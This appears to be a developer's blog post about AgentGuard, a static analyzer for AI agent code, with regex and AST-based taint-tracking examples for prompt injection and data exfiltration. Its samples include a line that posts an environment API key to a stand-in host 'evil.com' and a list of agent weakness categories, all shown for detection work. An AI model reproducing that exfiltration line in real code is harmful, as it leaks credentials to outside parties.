Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.

When I started building [AgentGuard](https://github.com/dockfixlabs/agentguard), the first question was: how do you detect a prompt injection vulnerability in source code? Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call; it's in how data is constructed.

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

    # ASI01: Prompt Injection
    FSTRING_INJECTION = re.compile(r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}', re.I)

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.

Regex has limits. Consider:

    # Pattern A: Obvious
    prompt = f"You are a helper. {user_input}"

    # Pattern B: Subtle
    template = "You are a helper. {input}"
    prompt = template.format(input=user_data)

    # Pattern C: Hidden
    messages = [{"role": "system", "content": config["system_prompt"] + user_message}]

Pattern A is trivial to detect. Pattern B requires understanding `.format()` semantics. Pattern C requires tracking data flow through dictionaries and list construction.

This is where AgentGuard is headed next: AST-based semantic analysis. The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow from sources (`user_input`, `query`, `message`, `request.body`) to sinks (`openai.chat.completions.create`, `prompt`, `messages`, `system`). This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.
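To make the idea concrete, here is a minimal sketch of name-based taint tracking with Python's standard `ast` module. It is not AgentGuard's implementation: the `SOURCES` and `SINKS` sets, the `find_tainted_sinks` helper, and the rule "any assignment that reads a tainted name taints its target" are all assumptions chosen for illustration. It only looks at top-level assignments and ignores function calls, attribute sources such as `request.body`, and control flow.

```python
import ast

# Hypothetical source and sink names, chosen for illustration only.
SOURCES = {"user_input", "user_data", "user_message", "query"}
SINKS = {"prompt", "messages", "system"}


def is_tainted(node, tainted):
    """Return True if any variable read inside `node` is currently tainted."""
    return any(
        isinstance(child, ast.Name) and child.id in tainted
        for child in ast.walk(node)
    )


def find_tainted_sinks(source):
    """Return (line, variable) pairs where tainted data reaches a sink name."""
    tainted = set(SOURCES)
    findings = []
    for stmt in ast.parse(source).body:
        if not isinstance(stmt, ast.Assign):
            continue  # this sketch only follows simple top-level assignments
        targets = [t.id for t in stmt.targets if isinstance(t, ast.Name)]
        if is_tainted(stmt.value, tainted):
            for name in targets:
                tainted.add(name)  # taint propagates to the assigned name
                if name in SINKS:
                    findings.append((stmt.lineno, name))
        else:
            for name in targets:
                tainted.discard(name)  # a clean reassignment clears taint
    return findings


SAMPLE = '''
prompt = f"You are a helper. {user_input}"
template = "You are a helper. {input}"
prompt = template.format(input=user_data)
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]
greeting = "hello"
'''

if __name__ == "__main__":
    for lineno, name in find_tainted_sinks(SAMPLE):
        print(f"line {lineno}: tainted data assigned to {name!r}")
```

Because the check walks the whole expression tree, Patterns A, B, and C are all flagged by the same rule: the f-string, the `.format()` keyword argument, and the dictionary value inside the list each contain a tainted name somewhere in their subtree. A production analyzer would also need scoping, inter-procedural flow, and sanitizer handling, which this sketch leaves out.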
AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

    # Line 1: Secret access
    api_key = os.environ.get("API_KEY")
    # Line 2: Network call
    requests.post("https://evil.com/collect", headers={"Auth": api_key})

The rule checks whether a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally. Future versions will extend this to full function-level taint tracking.

AgentGuard currently covers all 10 categories:

| ASI | Rule | Detection Method |
|---|---|---|
| ASI01 | Prompt Injection | Regex (f-string, concat, format) |
| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |
| ASI03 | Data Exfiltration | Regex + cross-line correlation |
| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |
| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |
| ASI06 | Insecure Output | Regex (raw HTML, eval output) |
| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |
| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |
| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |
| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |

The [benchmark suite](https://github.com/dockfixlabs/agentguard-benchmark) has 28 samples.

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.

[AgentGuard](https://github.com/dockfixlabs/agentguard) is MIT-licensed and open source. Install with `pip install dfx-agentguard`.
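For readers who want to experiment before installing, the ASI03 line-N / line-N+1 correlation described earlier can be sketched in a few lines. The two regexes and the `find_exfiltration` helper below are hypothetical stand-ins, not AgentGuard's actual rules; they only illustrate the adjacency check.

```python
import re

# Hypothetical patterns for illustration; AgentGuard's real rules may differ.
SECRET_ACCESS = re.compile(r"os\.environ(?:\.get)?\s*[\(\[]|os\.getenv\s*\(")
NETWORK_CALL = re.compile(r"\b(?:requests|httpx)\.(?:get|post|put)\s*\(")


def find_exfiltration(source):
    """Return (secret_line, network_line) pairs for adjacent matching lines."""
    lines = source.splitlines()
    findings = []
    for i in range(len(lines) - 1):
        # Flag only when the secret read is immediately followed by a network call.
        if SECRET_ACCESS.search(lines[i]) and NETWORK_CALL.search(lines[i + 1]):
            findings.append((i + 1, i + 2))  # report 1-indexed line numbers
    return findings


ADJACENT = (
    'api_key = os.environ.get("API_KEY")\n'
    'requests.post("https://evil.com/collect", headers={"Auth": api_key})\n'
)
SEPARATED = (
    'api_key = os.environ.get("API_KEY")\n'
    'log("loaded key")\n'
    'requests.post("https://evil.com/collect", headers={"Auth": api_key})\n'
)

if __name__ == "__main__":
    print(find_exfiltration(ADJACENT))
    print(find_exfiltration(SEPARATED))
```

The second sample shows why strict adjacency is only a starting point: a single unrelated line between the secret read and the network call is enough to evade the check, which is the gap that function-level taint tracking is meant to close.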